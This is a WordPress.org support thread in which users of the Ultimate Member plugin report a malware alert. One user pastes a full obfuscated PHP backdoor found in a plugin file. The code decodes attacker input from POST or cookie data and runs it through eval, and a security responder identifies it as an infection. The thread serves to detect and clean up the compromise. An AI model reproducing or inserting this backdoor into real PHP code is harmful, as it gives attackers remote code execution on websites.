Title: Malware detection Last modified: September 5, 2018 --- # Malware detection * Resolved [Jose Manuel Rodriguez Padrino](https://wordpress.org/support/users/jmrpadrino/) * (@jmrpadrino) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/) * I found, after the “malware” was detected, that the file class-um-mobile-detect. php tries to “validate” a web-based tablet model of a company called Vonino at http: //www.vonino. .eu / tablets. It turned out that when visiting this website, it sends a message that it is infected or that it is a malicious site. * It is possible that through this site and the plugin are infecting the sites in which Ultimate Member is used? * Is it possible to remove the validation of this “company”? * I tried to comment on these lines of code but the WordFense alert is still there! * Is there another solution? * Thank you very much … * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fmalware-detection-3%2F%3Foutput_format%3Dmd&locale=en_US) to see the link]_ Viewing 6 replies - 1 through 6 (of 6 total) * [quttera](https://wordpress.org/support/users/quttera/) * (@quttera) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10660224) * You are getting this notification because http[://]www.vonino[.]eu/tablets blacklisted by Google. ([https://transparencyreport.google.com/safe-browsing/search?url=http:%2F%2Fwww.vonino.eu%2Ftablets&hl=en](https://transparencyreport.google.com/safe-browsing/search?url=http:%2F%2Fwww.vonino.eu%2Ftablets&hl=en)) * Thread Starter [Jose Manuel Rodriguez Padrino](https://wordpress.org/support/users/jmrpadrino/) * (@jmrpadrino) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10660244) * Inside “um-filters-commenting.php” I found this: $kc4a948f = 3;$GLOBALS[‘bedb’] = Array();global $bedb;$bedb = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53”}[‘q3aa5906’] = “\x72\x42\x50\x41\x22\x5a\x3c\x4a\x7d\x5e\x53\x5d\x2e\x5b\x48\x46\x70\x73\x66\ x47\x77\x40\x21\x31\x39\x51\x79\x6a\x67\x4e\x3a\x24\x26\x61\x4f\x69\x6f\x2b\x6b\ x7c\x7b\xd\x4b\x52\x37\x36\x60\x3e\x27\x75\x32\x23\x2f\x74\x34\x3f\x78\xa\x25\ x43\x30\x64\x44\x5c\x62\x56\x6e\x65\x54\x6c\x38\x9\x20\x2a\x35\x33\x4c\x59\x7e\ x58\x57\x2c\x71\x3b\x6d\x5f\x29\x45\x76\x3d\x28\x63\x4d\x2d\x7a\x55\x49\x68”; $bedb[$bedb[‘q3aa5906’][84].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][70].$bedb[‘ q3aa5906’][23]] = $bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][97].$bedb[‘q3aa5906’][ 0];$bedb[$bedb[‘q3aa5906’][94].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘ q3aa5906’][75]] = $bedb[‘q3aa5906’][36].$bedb[‘q3aa5906’][0].$bedb[‘q3aa5906’][ 61];$bedb[$bedb[‘q3aa5906’][20].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][67].$ bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][ 67].$bedb[‘q3aa5906’][44]] = $bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][67].$bedb[‘ q3aa5906’][18].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][66].$bedb[‘q3aa5906’][ 67];$bedb[$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][23].$ bedb[‘q3aa5906’][64]] = $bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][53].$bedb[‘q3aa5906’][ 0].$bedb[‘q3aa5906’][69].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][66];$bedb[$bedb[‘ q3aa5906’][20].$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][ 33].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][33]] = $bedb[‘q3aa5906’][61].$bedb[‘ q3aa5906’][67].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 66].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][61];$bedb[$bedb[‘q3aa5906’][61].$ bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][ 33].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][50]] = $bedb[‘ q3aa5906’][35].$bedb[‘q3aa5906’][66].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 85].$bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][53];$bedb[$ bedb[‘q3aa5906’][49].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][ 91]] = $bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][0].$bedb[‘ q3aa5906’][35].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][69].$bedb[‘q3aa5906’][ 35].$bedb[‘q3aa5906’][94].$bedb[‘q3aa5906’][67];$bedb[$bedb[‘q3aa5906’][20].$ bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][ 23].$bedb[‘q3aa5906’][54]] = $bedb[‘q3aa5906’][16].$bedb[‘q3aa5906’][97].$bedb[‘ q3aa5906’][16].$bedb[‘q3aa5906’][88].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][ 0].$bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][36].$bedb[‘q3aa5906’][ 66];$bedb[$bedb[‘q3aa5906’][84].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][67].$ bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][ 60].$bedb[‘q3aa5906’][67]] = $bedb[‘q3aa5906’][49].$bedb[‘q3aa5906’][66].$bedb[‘ q3aa5906’][17].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][0].$bedb[‘q3aa5906’][35]. $bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][69].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 94].$bedb[‘q3aa5906’][67];$bedb[$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][50].$ bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][ 24]] = $bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][17].$bedb[‘ q3aa5906’][67].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][ 85].$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][91].$bedb[‘ q3aa5906’][36].$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][67];$bedb[$bedb[‘q3aa5906’][ 61].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][44].$bedb[‘q3aa5906’][24].$bedb[‘ q3aa5906’][61].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][44].$bedb[‘q3aa5906’][ 45]] = $bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][53].$bedb[‘ q3aa5906’][85].$bedb[‘q3aa5906’][53].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 84].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][69].$bedb[‘ q3aa5906’][35].$bedb[‘q3aa5906’][84].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 53];$bedb[$bedb[‘q3aa5906’][28].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][67].$ bedb[‘q3aa5906’][91]] = $bedb[‘q3aa5906’][56].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][ 23].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][60].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][45];$bedb[$bedb[‘q3aa5906’][56].$bedb[‘q3aa5906’][ 23].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][45]] = $bedb[‘ q3aa5906’][17].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][ 24].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][44];$bedb[$ bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][ 44].$bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][91]] = $_POST;$bedb[$bedb[‘q3aa5906’][ 17].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][23].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][ 75].$bedb[‘q3aa5906’][67]] = $_COOKIE;@$bedb[$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][ 45].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][33].$bedb[‘ q3aa5906’][70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][50]]($bedb[‘q3aa5906’][ 67].$bedb[‘q3aa5906’][0].$bedb[‘q3aa5906’][0].$bedb[‘q3aa5906’][36].$bedb[‘q3aa5906’][ 0].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][69].$bedb[‘q3aa5906’][36].$bedb[‘q3aa5906’][ 28], NULL);@$bedb[$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][ 54].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][50]]($bedb[‘q3aa5906’][69].$bedb[‘q3aa5906’][ 36].$bedb[‘q3aa5906’][28].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][67].$bedb[‘ q3aa5906’][0].$bedb[‘q3aa5906’][0].$bedb[‘q3aa5906’][36].$bedb[‘q3aa5906’][0]. $bedb[‘q3aa5906’][17], 0);@$bedb[$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][45]. $bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][ 70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][50]]($bedb[‘q3aa5906’][84].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][56].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][ 67].$bedb[‘q3aa5906’][56].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][91].$bedb[‘ q3aa5906’][49].$bedb[‘q3aa5906’][53].$bedb[‘q3aa5906’][35].$bedb[‘q3aa5906’][ 36].$bedb[‘q3aa5906’][66].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][53].$bedb[‘ q3aa5906’][35].$bedb[‘q3aa5906’][84].$bedb[‘q3aa5906’][67], 0);@$bedb[$bedb[‘ q3aa5906’][61].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][44].$bedb[‘q3aa5906’][ 24].$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][44].$bedb[‘ q3aa5906’][45]](0);if (!$bedb[$bedb[‘q3aa5906’][20].$bedb[‘q3aa5906’][61].$bedb[‘ q3aa5906’][70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][ 33]]($bedb[‘q3aa5906’][3].$bedb[‘q3aa5906’][76].$bedb[‘q3aa5906’][43].$bedb[‘ q3aa5906’][87].$bedb[‘q3aa5906’][3].$bedb[‘q3aa5906’][62].$bedb[‘q3aa5906’][77]. $bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][43].$bedb[‘q3aa5906’][95].$bedb[‘q3aa5906’][ 29].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][45].$bedb[‘ q3aa5906’][45].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][ 64].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][ 74].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][64].$bedb[‘ q3aa5906’][50].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][ 64].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][23].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][ 33].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][18].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][33])){$bedb[$bedb[‘q3aa5906’][20].$bedb[‘q3aa5906’][ 64].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][45].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][44]]($bedb[‘q3aa5906’][ 3].$bedb[‘q3aa5906’][76].$bedb[‘q3aa5906’][43].$bedb[‘q3aa5906’][87].$bedb[‘q3aa5906’][ 3].$bedb[‘q3aa5906’][62].$bedb[‘q3aa5906’][77].$bedb[‘q3aa5906’][85].$bedb[‘q3aa5906’][ 43].$bedb[‘q3aa5906’][95].$bedb[‘q3aa5906’][29].$bedb[‘q3aa5906’][85].$bedb[‘ q3aa5906’][75].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][ 33].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][70].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][ 50].$bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][74].$bedb[‘q3aa5906’][74].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][ 23].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][18].$bedb[‘ q3aa5906’][23].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][ 33].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][60].$bedb[‘ q3aa5906’][50].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][ 33], 1);$a3ebc = NULL;$t6110e57 = NULL;$bedb[$bedb[‘q3aa5906’][88].$bedb[‘q3aa5906’][ 24].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][45].$bedb[‘q3aa5906’][64].$bedb[‘ q3aa5906’][45].$bedb[‘q3aa5906’][18]] = $bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][ 45].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][75].$bedb[‘ q3aa5906’][44].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][ 93].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][23].$bedb[‘ q3aa5906’][67].$bedb[‘q3aa5906’][93].$bedb[‘q3aa5906’][54].$bedb[‘q3aa5906’][ 45].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][93].$bedb[‘ q3aa5906’][24].$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][ 64].$bedb[‘q3aa5906’][93].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][18].$bedb[‘ q3aa5906’][60].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][ 61].$bedb[‘q3aa5906’][50].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][74].$bedb[‘ q3aa5906’][75].$bedb[‘q3aa5906’][44].$bedb[‘q3aa5906’][45];global $v9b6b6f;function s829007($a3ebc, $b5714){global $bedb;$z89606650 = “”;for ($ydba92=0; $ydba92< $bedb[$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][23].$bedb[‘ q3aa5906’][64]]($a3ebc);){for ($b5d0be=0; $b5d0be<$bedb[$bedb[‘q3aa5906’][67]. $bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][64]]($b5714) && $ydba92<$bedb[$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][23]. $bedb[‘q3aa5906’][64]]($a3ebc); $b5d0be++, $ydba92++){$z89606650 .= $bedb[$bedb[‘ q3aa5906’][84].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][ 23]]($bedb[$bedb[‘q3aa5906’][94].$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][70]. $bedb[‘q3aa5906’][75]]($a3ebc[$ydba92]) ^ $bedb[$bedb[‘q3aa5906’][94].$bedb[‘ q3aa5906’][33].$bedb[‘q3aa5906’][70].$bedb[‘q3aa5906’][75]]($b5714[$b5d0be]));}} return $z89606650;}function x41b10b6($a3ebc, $b5714){global $bedb;global $v9b6b6f; return $bedb[$bedb[‘q3aa5906’][56].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][18]. $bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][45]]($bedb[$bedb[‘q3aa5906’][56].$bedb[‘ q3aa5906’][23].$bedb[‘q3aa5906’][18].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][ 45]]($a3ebc, $v9b6b6f), $b5714);}foreach ($bedb[$bedb[‘q3aa5906’][17].$bedb[‘ q3aa5906’][60].$bedb[‘q3aa5906’][24].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][ 64].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][75].$bedb[‘ q3aa5906’][67]] as $b5714=>$kf7c){$a3ebc = $kf7c;$t6110e57 = $b5714;}if (!$a3ebc){ foreach ($bedb[$bedb[‘q3aa5906’][61].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][ 60].$bedb[‘q3aa5906’][44].$bedb[‘q3aa5906’][75].$bedb[‘q3aa5906’][91]] as $b5714 =>$kf7c){$a3ebc = $kf7c;$t6110e57 = $b5714;}}$a3ebc = @$bedb[$bedb[‘q3aa5906’][ 84].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][67].$bedb[‘q3aa5906’][24].$bedb[‘ q3aa5906’][54].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][ 67]]($bedb[$bedb[‘q3aa5906’][28].$bedb[‘q3aa5906’][23].$bedb[‘q3aa5906’][67]. $bedb[‘q3aa5906’][91]]($bedb[$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][50].$bedb[‘ q3aa5906’][64].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][91].$bedb[‘q3aa5906’][ 24]]($a3ebc), $t6110e57));if (isset($a3ebc[$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][ 38]]) && $v9b6b6f==$a3ebc[$bedb[‘q3aa5906’][33].$bedb[‘q3aa5906’][38]]){if ($ a3ebc[$bedb[‘q3aa5906’][33]] == $bedb[‘q3aa5906’][35]){$ydba92 = Array($bedb[‘ q3aa5906’][16].$bedb[‘q3aa5906’][88] => @$bedb[$bedb[‘q3aa5906’][20].$bedb[‘q3aa5906’][ 74].$bedb[‘q3aa5906’][64].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][23].$bedb[‘ q3aa5906’][54]](),$bedb[‘q3aa5906’][17].$bedb[‘q3aa5906’][88] => $bedb[‘q3aa5906’][ 23].$bedb[‘q3aa5906’][12].$bedb[‘q3aa5906’][60].$bedb[‘q3aa5906’][93].$bedb[‘ q3aa5906’][23],);echo @$bedb[$bedb[‘q3aa5906’][49].$bedb[‘q3aa5906’][60].$bedb[‘ q3aa5906’][67].$bedb[‘q3aa5906’][91]]($ydba92);}elseif ($a3ebc[$bedb[‘q3aa5906’][ 33]] == $bedb[‘q3aa5906’][67]){eval/*ta41b49b6*/($a3ebc[$bedb[‘q3aa5906’][61]]);} exit();}} * Is that normal? * [quttera](https://wordpress.org/support/users/quttera/) * (@quttera) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10660305) * Yes, it looks like an infection. First of all, the currently available content of ./ultimate-member/includes/core/um-filters-commenting.php does not have this code, * The second very suspicious thing is following * eval**/\*ta41b49b6\*/**($a3ebc[$bedb[‘q3aa5906’][61]]);}**exit**(); * The first comment is used to overcome pattern detection, and the last call to exit(); also look very suspicious. * I forward this sample to our lab for deobfuscation, will post here more details when available. * Thread Starter [Jose Manuel Rodriguez Padrino](https://wordpress.org/support/users/jmrpadrino/) * (@jmrpadrino) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10660316) * Thanks! [@quttera](https://wordpress.org/support/users/quttera/) * [malinaboy](https://wordpress.org/support/users/malinaboy/) * (@malinaboy) * [7 years, 9 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10668272) * According to stats almost 7000 websites were infected with this malware, I wonder how many % of them because of hole in that plugin? * [isabelsaez85](https://wordpress.org/support/users/isabelsaez85/) * (@isabelsaez85) * [7 years, 8 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10703670) * My site is been infected too, I installed Wordfence to detected, every day I scan it and it comes back, I delete the files and clean it but I still have this problem. * Not sure how to solve it they said to upgrade to the new version. I have that version but still, have this malware. * I’m so desperate Viewing 6 replies - 1 through 6 (of 6 total) The topic ‘Malware detection’ is closed to new replies. * ![](https://ps.w.org/ultimate-member/assets/icon-256x256.png?rev=3160947) * [Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin](https://wordpress.org/plugins/ultimate-member/) * [Frequently Asked Questions](https://wordpress.org/plugins/ultimate-member/#faq) * [Support Threads](https://wordpress.org/support/plugin/ultimate-member/) * [Active Topics](https://wordpress.org/support/plugin/ultimate-member/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/ultimate-member/unresolved/) * [Reviews](https://wordpress.org/support/plugin/ultimate-member/reviews/) * 6 replies * 4 participants * Last reply from: [isabelsaez85](https://wordpress.org/support/users/isabelsaez85/) * Last activity: [7 years, 8 months ago](https://wordpress.org/support/topic/malware-detection-3/#post-10703670) * Status: resolved